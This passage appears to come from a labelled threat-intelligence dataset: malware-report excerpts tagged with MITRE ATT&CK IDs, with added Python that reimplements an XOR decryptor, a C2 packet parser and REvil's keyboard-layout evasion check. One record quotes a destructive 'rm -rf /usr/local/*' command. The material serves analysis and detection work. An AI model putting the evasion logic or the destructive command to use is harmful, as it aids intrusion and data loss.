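from that description and exists only to build test input.
"""


def xor_chain_decrypt(data: bytes) -> bytes:
    """Undo the chaining in place, last byte first, as the report describes.

    Walking backwards matters: when byte i is processed, byte i-1 is still in its
    encrypted form, which is exactly the value the encryptor chained it with.
    """
    buf = bytearray(data)
    for i in range(len(buf) - 1, 0, -1):   # index 0 is excluded
        buf[i] ^= buf[i - 1]
    return bytes(buf)


def xor_chain_encrypt(plain: bytes) -> bytes:
    """Assumed inverse: forward chaining, each byte XORed with the previous
    *encrypted* byte. Used only to build constructed test data."""
    buf = bytearray(plain)
    for i in range(1, len(buf)):
        buf[i] ^= buf[i - 1]
    return bytes(buf)


def xor_chain_decrypt_forward_in_place(data: bytes) -> bytes:
    """Deliberately wrong order, kept to show the pitfall. Processing from the
    front overwrites byte i-1 before byte i uses it; this loop is in fact the
    encryptor itself, so the output diverges from the plaintext after byte 1."""
    buf = bytearray(data)
    for i in range(1, len(buf)):
        buf[i] ^= buf[i - 1]
    return bytes(buf)


if __name__ == "__main__":
    # Constructed sample input, not data taken from the report.
    plaintext = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"
    blob = xor_chain_encrypt(plaintext)
    print("encrypted :", blob.hex())
    print("decrypted :", xor_chain_decrypt(blob).hex())
    print("wrong way :", xor_chain_decrypt_forward_in_place(blob).hex())
```

When reimplementing a routine like this from a figure, the round trip against a constructed plaintext is the check worth keeping: a forward in-place loop looks identical at a glance but re-encrypts rather than decrypts.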
|
|
{"text1":"Once the malware was persisted and kicked off the launch items, it invokes a function named create_rescue_executable to create yet another copy of itself. This copy will be made in the user\u2019s Library directory. Its name starts with a . so that it won\u2019t show up in the UI (i.e. Finder.app), and is then followed by 9 random characters","labels":"['T1564.001']"}
|
|
{"text1":"The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago in January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1059.003']"}
|
|
{"text1":"Execute Pluginhost.exe, the plugin management component. Save the payloads as Alternate Data Streams and set scheduled tasks to run them","labels":"['T1564.004']"}
|
|
{"text1":"Upon execution, GoldMax retrieves a list of the system\u2019s network interfaces; the malware terminates if it is unable to do so or no network interface is configured. It then attempts to determine if any of the network interfaces has the following hardcoded MAC address: c8:27:cc:c2:37:5a","labels":"['T1016']"}
|
|
{"text1":"As with much of the malware distributed by TA505, The Trick has appeared in frequent, high-volume campaigns. The campaigns used a mix of attached zipped scripts (WSF, VBS), malicious Microsoft Office documents (Word, Excel), HTML attachments, password-protected Microsoft Word documents, links to malicious JavaScript, and other vectors. The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick","labels":"['T1027', 'T1204.001', 'T1204.002']"}
|
|
{"text1":"As a Windows Management Instrumentation (WMI) client application, it initializes COM and connects to the \\\\root\\cimv2 namespace to use the IWbemServices pointer and make WMI requests. The code executes wql queries (\u201cwql\u201d is \u201csql for wmi\u201d, a subset of sql) to gather victim host details, like the query \u201cSELECT Description, Manufacturer, Name, ProcessorId FROM Win32_Processor\u201d. Here are several queries from the BlackEnergy2 plugin code","labels":"['T1047']"}
|
|
{"text1":"Cisco Talos' previous research has mainly linked this group to CrimsonRAT, but new campaigns show they are expanding their Windows malware arsenal with ObliqueRAT. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. After enabling macros, the file executes CrimsonRAT on the endpoint. Figure 4: The \"Download Now\" button contains a link to a malicious XLS with CrimsonRAT embedded in it. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense themes in their phishing emails and maldocs to target Indian military and government personnel. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. In a few of these instances, the malicious executables in the archives contained honeytrap-themed icons to entice the victims into executing them","labels":"['T1204.001']"}
|
|
{"text1":"The back door Java file uses a custom class loader that loads encrypted class files (named Opcion[1-14]) as it receives commands from the RAT controller server. The key, specified by the attacker when creating the back door, is used to encrypt the class files using DES as a stream cipher","labels":"['T1027']"}
|
|
{"text1":"The results are Gzipped and saved under a random file in the temp folder. Following successful collection of information, the data is sent back to the C2 and the file is deleted","labels":"['T1074.001', 'T1560.001']"}
|
|
{"text1":"Below is an example of anti-analysis technique showing the loader checking if the victim system is a VMware or VirtualBox VM","labels":"['T1497.001']"}
|
|
{"text1":"POWRUNER may also receive batch commands from the C2 server to collect host information from the system. An example batch command is provided in Figure 11","labels":"['T1069.002', 'T1069.001', 'T1087.002']"}
|
|
{"text1":"First, just like the Gh0st in the dshell paper from SANS, the decrypted protocol consists of a 5 byte header (ngLGX), a 4byte packet length field, and finally another 4 byte uncompressed length field. This is where the similarity ends as the Opcode and the data are compressed using ZLib, instead of just the data. Additionally, the entire packet is encrypted with an algorithm making visual analysis of the Wireshark data challenging. However, as the packet header is static, you can use the encrypted header as an identifier, like I did in my script. The encrypted header is: \u201c\\xEA\\xEE\\xCC\\xD3\\xB8\u201d and is unchanged throughout the malware\u2019s runthrough","labels":"['T1132.001']"}
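The framing in the record above (a 5-byte header, a 4-byte packet length, a 4-byte uncompressed length, then a zlib stream that holds the opcode together with the data) is enough to build a parser for the decrypted form, and the static encrypted header is enough to locate packets in raw traffic before any decryption. What follows is an added example written for this page, not the analyst's own script from the article. It assumes details the text does not state: both length fields are little-endian unsigned 32-bit integers, the packet length counts the whole packet including the 13-byte header, and the opcode is a single byte in front of the data. The packet cipher itself is not described on the page and is not modelled; the parser works on payloads that have already been decrypted.

```python
"""
Added example, not the original analyst's script: builder/parser for the decrypted
framing described in the text (5-byte "ngLGX" header, 4-byte packet length, 4-byte
uncompressed length, zlib-compressed opcode+data) plus a scanner for the static
encrypted header EA EE CC D3 B8. Endianness, the meaning of the length field and
the 1-byte opcode are assumptions, not facts from the page.
"""
import struct
import zlib

MAGIC = b"ngLGX"                        # header as it appears after decryption
ENC_MAGIC = b"\xEA\xEE\xCC\xD3\xB8"     # the same header as it appears on the wire
HEADER_FMT = "<5sII"                    # magic, packet_len, uncompressed_len (assumed LE)
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 13 bytes


def build_packet(opcode: int, data: bytes) -> bytes:
    """Frame opcode+data the way the decrypted protocol lays it out."""
    body = bytes([opcode]) + data
    compressed = zlib.compress(body)
    return struct.pack(HEADER_FMT, MAGIC, HEADER_LEN + len(compressed), len(body)) + compressed


def parse_packet(buf: bytes) -> tuple[int, bytes]:
    """Validate the header and return (opcode, data); raise ValueError on bad input."""
    if len(buf) < HEADER_LEN:
        raise ValueError("short packet")
    magic, packet_len, uncompressed_len = struct.unpack(HEADER_FMT, buf[:HEADER_LEN])
    if magic != MAGIC:
        raise ValueError("bad magic %r" % magic)
    if packet_len != len(buf):
        raise ValueError("length field %d != %d bytes received" % (packet_len, len(buf)))
    if uncompressed_len < 1:
        raise ValueError("no room for an opcode")
    # Decompression-bomb guard: never inflate past the advertised size (+1 so a
    # lying header is detected as a mismatch rather than silently truncated).
    body = zlib.decompressobj().decompress(buf[HEADER_LEN:], uncompressed_len + 1)
    if len(body) != uncompressed_len:
        raise ValueError("uncompressed length mismatch")
    return body[0], body[1:]


def find_encrypted_headers(stream: bytes) -> list[int]:
    """Offsets of the static encrypted header inside a reassembled TCP stream.

    Because the header is constant across the run, this is usable as a
    packet-boundary finder without knowing the cipher.
    """
    offsets, pos = [], stream.find(ENC_MAGIC)
    while pos != -1:
        offsets.append(pos)
        pos = stream.find(ENC_MAGIC, pos + 1)
    return offsets


if __name__ == "__main__":
    # Constructed traffic, not a capture from the report.
    pkt = build_packet(0x20, b"dir C:\\")
    print("decrypted packet:", pkt.hex())
    print("parsed          :", parse_packet(pkt))
    fake_stream = b"\x00" * 7 + ENC_MAGIC + b"\x11" * 20 + ENC_MAGIC + b"\x22" * 3
    print("wire offsets    :", find_encrypted_headers(fake_stream))
```

The length checks are the part a practitioner should keep: a C2 protocol that carries its own lengths is where a parser written in a hurry accepts a packet_len larger than the buffer or inflates an unbounded zlib stream.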
|
|
{"text1":"Attackers like to use spear-phishing email with a password protected RAR attachment to avoid being detected by the email gateway. The decryption password is provided in the mail body and inside the attachment it is an MHTML macro based document with the .doc suffix. Its purpose is to implant Imminent backdoor and gain a foothold into the target network which may make the follow up lateral movement easier to implement","labels":"['T1027']"}
|
|
{"text1":"This cabinet file is then extracted to the previously identified file path. Again, a shortcut file is written to the %TEMP% path with a name of \u2018~Update.lnk\u2019, which is in turn copied to the identified startup path with a filename of \u2018Windows help.lnk\u2019. This shortcut file calls the built-in \u2018control.exe\u2019 utility to in turn load the previously dropped malicious CPL file of \u2018winhelp.cpl\u2019. Finally, the malware calls the \u2018winhelp.cpl\u2019 file in a new process via the following command","labels":"['T1012']"}
|
|
{"text1":"Persistence with BITS UBoatRAT achieves persistence by using Microsoft Windows Background Intelligent Transfer Service (BITS). BITS is a service for transferring files between machines. Though the most famous application using the service is Windows Update, other applications or users can take advantage of the component. The tool provides the option, \/SetNotifyCmdLine which executes a program when the job finishes transferring data or is in error. UBoatRAT takes advantage of the option to ensure it stays running on a system, even after a reboot. After completing the copying of the local file, BITS executes the UBoatRAT file configured with \/SetNotifyCmdLine at the third line","labels":"['T1197']"}
|
|
{"text1":"It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the \/Library\/LaunchDaemons\/ folder (Scheduled Task\/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004","labels":"['T1543.004']"}
|
|
{"text1":"The group extensively uses long-running strategic web compromises[2] (SWCs), and relies on whitelists to deliver payloads to select victims. In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger","labels":"['T1189']"}
|
|
{"text1":"Both variants of the BitPaymer malware feature multiple techniques to hinder analysis. The malware developers have employed a combination of encrypted strings, string hashes and dynamic API resolution to ensure that no strings exist in the binary","labels":"['T1106']"}
|
|
{"text1":"Ramsay implements a decentralized way of storing these artifacts among the victim\u2019s file system by using inline hooks applied on two Windows API functions, WriteFile and CloseHandle","labels":"['T1106']"}
|
|
{"text1":"The VBScript also uploads the output of the provided batch scripts to the command and control (C2) server, which provides threat actors a functional remote shell to the system","labels":"['T1119']"}
|
|
{"text1":"The malware collects loads of sensitive data, which are then temporarily stored in files and deleted after they have been successfully uploaded to the C&C servers. Even the deleted files can, however, be recovered by an experienced system administrator, which could help further investigation of the attack \u2013 after the victim becomes aware of it. This is possible due to the fact that some data still reside on a disk even after a file is deleted. To prevent this, the malware has the ability to safe-delete all the files, which means it first overwrites the data in a file with zeroes or random bytes, and only then is the file deleted","labels":"['T1070.004']"}
|
|
{"text1":"It uses virtualization software \u2013 QEMU on macOS and VirtualBox on Windows \u2013 to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner. 2) Shell scripts used to launch the QEMU images. qemuservice shell script . After the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed: - qemuservice won\u2019t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload the plist that it was launched by. Before installation, version 1 of the miner is removed along with executing the command: rm -rf \/usr\/local\/* . As seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process. Launching the Linux image . All versions use multiple shell scripts to launch the images. Version 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service. All versions use the following switches: - -M accel=hvf to use the Hypervisor framework as an accelerator. There are, however, some hints that can help you to identify when an application contains unwanted code: - A trust popup from an unexpected, \u201cadditional\u201d installer (in this case the Oracle network adapter). - High CPU consumption by a process you did not install (QEMU or VirtualBox in this case). - A new service added to the startup services list (Windows) or a new Launch Daemon (macOS). - Network connections to curious domain names (such as system-update[.]info or system-check[.]services here). Indicators of Compromise (IoCs) . Hashes . macOS \u201ccracked\u201d applications (versions 1-3) . Windows \u201ccracked\u201d applications (version 4) . Linux images . Filenames . macOS . Windows . Hostnames . Download hosts (via HTTP on port 80) . Update hosts (via SCP) . Mining hosts . MITRE ATT&CK techniques . 20 Jun 2019 - 11:00AM","labels":"['T1569.001']"}
|
|
{"text1":"Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. This campaign relies on the abuse of Blogspot to host attacker-operated blogs serving malicious VB based scripts to their targets. We've found preliminary malicious components from initial access beacons to file exfiltrators being deployed to victims. In many cases, the content of these preliminary components was combined to serve special scripts to victims. The final implants utilized by the actors in this campaign are derivatives of the Gold Dragon\/Brave Prince malware families. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations","labels":"['T1608.001']"}
|
|
{"text1":"If the user opens the file and the exploitation is successful, a backdoor Trojan is installed on the system that gives the attacker access and a decoy document is displayed to the victim. The main module is also responsible for communicating with its C2 servers and handling commands issued by the C2 server. Figure 8: FakeM Architecture . All FakeM variants initiate communications with its C2 server and check the C2\u2019s response for a command. After sending the acknowledgement packet, the Trojan will gather local system information and include it in a beacon to the C2 server. The Trojan uses AES to encrypt the communication channel with its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4. Unit 42 tracks this mobile Trojan as MobileOrder, as the authors specifically refer to commands within the app as orders. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. The C2 server will respond to requests from MobileOrder with commands that the Trojan refers to as \u201corders\u201d. MobileOrder contains a command handler with functionality that provides a fairly robust set of commands, as seen in Table 6. Table 6: MobileOrder command handler . Infrastructure Overlap and Related Tools . There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants, as well as other Trojans such as MobileOrder, Psylo, and CallMe. Actors will run HTRAN on a server and configure their malware to interact with that server; however, the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists","labels":"['T1083']"}
|
|
{"text1":"So far, our telemetry hasn\u2019t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it\u2019s worth mentioning that for one victim we found a correlation between the execution of Remexi\u2019s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload","labels":"['T1059.005']"}
|
|
{"text1":"Second technique: FIN6 also leveraged the creation of Windows services (named with a random 16-character string such as IXiCDtPbtGWnrAGQ) to execute encoded PowerShell commands. The randomly named service is a by-product of using Metasploit, which creates the 16-character service by default. The encoded command contained a Metasploit reverse HTTP shellcode payload stored in a byte-array like the first technique. This C2 URL contained shellcode that would make an HTTPS request for an additional download","labels":"['T1059.001']"}
|
|
{"text1":"PowerShell Cobalt Strike Beacon - New payload + new C2 domain - PowerShell Obfuscator - All the new PowerShell payloads are obfuscated using a publicly available script adapted from Daniel Bohannon\u2019s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper - A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper - Inspired by known Outlook credentials dumpers","labels":"['T1552.002']"}
|
|
{"text1":"During the first C&C call, the backdoor sends a pack with the victim\u2019s system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware","labels":"['T1012', 'T1560']"}
|
|
{"text1":"Each payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address. So far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success. We\u2019ve seen mining payloads compiled as early as December 2019 and as recently as late April 2020. In each compilation, one of the two wallets has been embedded into the binary. The wallet addresses could be extracted from the binaries easily in earlier versions using a simple strings command. In newer versions, the string is obfuscated","labels":"['T1027']"}
|
|
{"text1":"Certutil is a living-off-the-land command line utility that can be used to obtain certificate authority information and configure certificate services. Threat actors usually utilize certutil to download remote files from a given URL. It also incorporates a built-in function to decode base64-encoded files","labels":"['T1140']"}
|
|
{"text1":"In the first campaign, the email (Figure 1) purported to be from FinCERT [8] with the subject \u201c\u041f\u0430\u043c\u044f\u0442\u043a\u0430 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u201d (Information Security Notice) and contained a Microsoft Word attachment named \u201c\u0441\u0432\u043e\u0434\u043a\u04301705.doc\u201d (report1705) (Figure 3). - Another email (Figure 2) purported to be from Security Support for PCI-DSS [3] at a major credit card company with the subject line \u201c\u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u201d (security) and a Microsoft Word attachment (Figure 4) \u201c\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.doc\u201d (Safety requirements","labels":"['T1566.001']"}
|
|
{"text1":"Web inject \u2013 the configuration file for the hooking module Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim\u2019s traffic by injecting the module into the browser\u2019s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page","labels":"['T1185', 'T1059.007']"}
|
|
{"text1":"My blog post, \u201cRemote Mac Exploitation Via Custom URL Schemes\u201d, describes the technical details of how WindShift (ab)used custom URL schemes to infect macOS systems","labels":"['T1189']"}
|
|
{"text1":"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years. However, this has not deterred this actor from continuing and expanding their activities. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. The use of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key as a persistence mechanism has been replaced by the creation of a service. The dropped files are now stored in a folder located in C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\ always following the same pattern similar to the following: 4CA-B25C11-A27BC. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp. Mysterious Wintask.xml . Our initial analysis in a sandbox showed that the C2 contact module attempts to execute this file, searching for it in the same path as the document search module, which we further corroborated with manual analysis. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network","labels":"['T1204.002']"}
|
|
{"text1":"One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. With a successful connection, it will send the word \"almond\". The server should reply either with \"who\" or \"ice\". The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are","labels":"['T1033']"}
|
|
{"text1":"APT15 then used a tool known as RemoteExec (similar to Microsoft\u2019s Psexec) in order to remotely execute batch scripts and binaries","labels":"['T1569.002']"}
|
|
{"text1":"At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing. However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign","labels":"['T1218.011']"}
|
|
{"text1":"After the exploit succeeds, this Fallout Exploit Kit downloads a \u201c.tmp\u201d file to the %Temp% directory and calls CreateProcess to execute it. Further analysis revealed that the \u201c.tmp\u201d file was the latest variant of Azorult malware. It was the first time we\u2019ve seen the new variant of Azorult malware used as primary payload for Fallout Exploit Kit","labels":"['T1105']"}
|
|
{"text1":"In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form (T1059.001: PowerShell","labels":"['T1059.001']"}
|
|
{"text1":"When initially executed, the malware will check its current working directory. Should it not match the expected path, Cardinal will enter its installation routine. Cardinal RAT will copy itself to a randomly named executable in the specified directory. It will then compile and execute embedded source code that contains watchdog functionality. Specifically, this newly spawned executable will ensure that the following registry key is set","labels":"['T1027.004', 'T1012', 'T1083']"}
|
|
{"text1":"A custom executable that only contains the Metasploit shellcode. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8","labels":"['T1547.001']"}
|
|
{"text1":"It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPS if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. Persistence is maintained through a Run registry key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past","labels":"['T1574.001']"}
|
|
{"text1":"The ransomware also stops security software-related processes to evade detection and termination of its malicious activities","labels":"['T1518.001', 'T1562.001']"}
|
|
{"text1":"Later, the attackers are observed executing an HTA file hosted on a remote server by abusing mshta.exe via depended.exe. The Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings","labels":"['T1218.005']"}
|
|
{"text1":"APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection","labels":"['T1553.002']"}
|
|
{"text1":"Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are stored in randomly named .dat files within the Skype folder","labels":"['T1123', 'T1125']"}
|
|
{"text1":"During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command","labels":"['T1204.002']"}
|
|
{"text1":"The attackers used the famous Mimikatz credential dumping tool as their main tool to obtain credentials including user passwords, NTLM hashes and Kerberos tickets. Mimikatz is a very popular tool and is detected by most antivirus vendors and other security products. Therefore, the attackers used over 10 different customized Mimikatz payloads, which were obfuscated and packed in a way that allowed them to evade antivirus detection","labels":"['T1588.002']"}
|
|
{"text1":"Editor\u2019s note: Following publication of this blog, it came to our attention that AhnLab encountered what appears to be an earlier version of SDBbot, described in their recent Q3 ASEC Report as a \u201cmalicious SDB file. AhnLab describes delivery of the malware in South Korean campaigns as a secondary payload to the FlawedAmmyy RAT. TA505 has been active in South Korea in 2019 and frequently distributes the FlawedAmmyy RAT, but we cannot verify the connection at this time","labels":"['T1204.002']"}
|
|
{"text1":"This DLL is used for decrypting and executing another JavaScript backdoor such as Orz. The DLL is registered by the installer using regsvr32. If the string \u201cDR\u201d is passed as an argument, or if the DLL is running in the active session with a username that is not \u201csystem\u201d, the final JavaScript backdoor is decoded using a custom base64 alphabet. This backdoor has to be present in the same directory as the dll, with a \u201c.tmp\u201d file extension. The backdoor script is then executed using the IActiveScript and IActiveScriptParse32 COM interfaces","labels":"['T1140']"}
|
|
{"text1":"The \u2018vac.dll\u2019 DLL file is signed with a valid, legitimate digital signature, although the file has been tampered with. At first glance, the fact that its digital signature is valid would suggest the file has not been manipulated after being digitally signed","labels":"['T1553.002']"}
|
|
{"text1":"Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring","labels":"['T1053.005']"}
|
|
{"text1":"CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs. The threat actors steal data from compromised systems over a long period of time, which likely indicates a long-term objective of monitoring the target's network. BRONZE PRESIDENT uses custom batch scripts to collect either specific file types (including files with .pptx, .xlsx, .pdf extensions) or all files within a specific location. CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts, such as social media and webmail accounts","labels":"['T1119']"}
|
|
{"text1":"The malware calls User32.dll's GetKeyboardLayoutList function, inspects the keyboard identifier, and returns true if the result ends in a value between \\x18 and \\x44 inclusive. This result means the compromised host is whitelisted based on the host's configured keyboard layout. The malware inspects only the lower byte of the full keyboard identifier, so all systems using the keyboard locales listed in Table 4 are immune to REvil. Despite the large number of potential matches, CTU researchers suspect that the malware author intended to identify Russian keyboards based on several other links to the Russia-based GandCrab ransomware","labels":"['T1082']"}
|
|
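The keyboard-layout check in the REvil record above, written out as an added example (not REvil's code). The only facts taken from the record are that GetKeyboardLayoutList is queried, that only the low byte of each layout identifier is examined, and that a low byte from 0x18 to 0x44 inclusive marks the host as allow-listed; the sample layout identifiers and the Windows read-back helper are mine.

```python
"""Keyboard-layout allow-list check of the kind the REvil record describes.

Added illustration, not REvil's code. From the record: GetKeyboardLayoutList is
queried, only the low byte of each layout identifier is examined, and a low byte
in 0x18..0x44 inclusive marks the host as allow-listed. Sample identifiers below
are constructed for the demo.
"""
import sys

LOW, HIGH = 0x18, 0x44
PRIMARY_RUSSIAN = 0x19  # LANG_RUSSIAN; the primary language id is the low 10 bits of a LANGID


def layout_is_allowlisted(hkl: int) -> bool:
    """The check itself: only the least-significant byte of the handle matters."""
    return LOW <= (hkl & 0xFF) <= HIGH


def host_is_allowlisted(layouts) -> bool:
    """Any installed layout passing the check is enough ('returns true')."""
    return any(layout_is_allowlisted(h) for h in layouts)


def over_matches(layouts):
    """Layouts that pass although their primary language is not Russian: the record's
    point that a low-byte test is far broader than the author's probable intent."""
    return [h for h in layouts
            if layout_is_allowlisted(h) and (h & 0x3FF) != PRIMARY_RUSSIAN]


def installed_layouts():
    """Read the real list through user32 on Windows; return [] elsewhere so the demo runs offline."""
    if sys.platform != "win32":
        return []
    import ctypes
    user32 = ctypes.windll.user32
    n = user32.GetKeyboardLayoutList(0, None)          # first call: how many handles
    buf = (ctypes.c_size_t * n)()
    user32.GetKeyboardLayoutList(n, buf)               # second call: fill the array
    return [int(h) for h in buf]


# Constructed HKL values; the low word is the LANGID (0x0409 en-US, 0x0419 ru-RU, 0x0422 uk-UA, 0x0437 ka-GE).
SAMPLE_HOSTS = {
    "us_only":    [0x04090409],
    "us_plus_ru": [0x04090409, 0x04190419],
    "ukrainian":  [0x04220422],
    "georgian":   [0x04370437],
}

if __name__ == "__main__":
    for name, layouts in SAMPLE_HOSTS.items():
        print(f"{name:11s} allow-listed={host_is_allowlisted(layouts)} "
              f"over_matches={[hex(h) for h in over_matches(layouts)]}")
    if installed_layouts():
        print("this host:", host_is_allowlisted(installed_layouts()))
```

Because only the low byte is compared, a Georgian layout (0x0437, low byte 0x37) passes exactly as a Russian one does, which is why the record calls the set of matching locales large.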
{"text1":"The malware checks the language of the machine with function \u201cGetUserDefaultUILanguage\u201d and saves the value in the stack; it is not checked automatically after the call, but it is important later","labels":"['T1614.001']"}
|
|
{"text1":"Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers","labels":"['T1057', 'T1518.001']"}
|
|
{"text1":"In the obfuscated and packed version of the loader, an uncommon API call is used to facilitate code injection. As seen in the image below, the loader uses VirtualAllocExNuma to allocate new memory and store the returned base address. The beginning of an obfuscated shellcode is copied to this address after being decrypted using an RC4 algorithm. In addition to the shellcode, an additional PE can be seen in memory","labels":"['T1106']"}
|
|
